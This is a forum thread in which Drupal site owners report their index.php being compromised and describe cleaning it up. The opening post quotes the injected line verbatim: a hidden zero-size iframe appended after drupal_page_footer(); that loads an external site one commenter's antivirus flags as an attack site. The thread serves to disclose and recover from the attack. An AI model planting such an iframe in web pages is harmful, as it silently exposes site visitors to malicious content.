Earlier today my site was working just fine until I got the following error:

Parse error: syntax error, unexpected '<' in /home/jhustler/public_html/superhaitian/index.php on line 37

I checked a few files and was shocked to find the following line on the bottom of my index.php page:

drupal_page_footer();<!-- ~ --><iframe width=0 height=0 src=http://www.free20.com/portal/index.php?aff=razecc></iframe><!-- ~ -->

Comments

phoenix@middypuppy.com’s picture

Thank you. This also happened to me!

Fuzzytek’s picture

I also had a site hacked today with a script appended to the drupal_page_footer(); line.
Decided I would change access rights for owner to Read-Only. Might slow them down a little. Time for me to change passwords around.

prodos’s picture

Reporting that my Drupal v6.9 (installed with Fantastico) had a similar thing done to it a couple of days ago.

The script that was added included the URL of a site which, when I visited, got blocked by my anti-virus program as an "attack" site.

I simply logged into my FTP program, opened index.php and removed the implanted code that came after:

drupal_page_footer();

Now my site - actually, two of them - seems to be working fine again.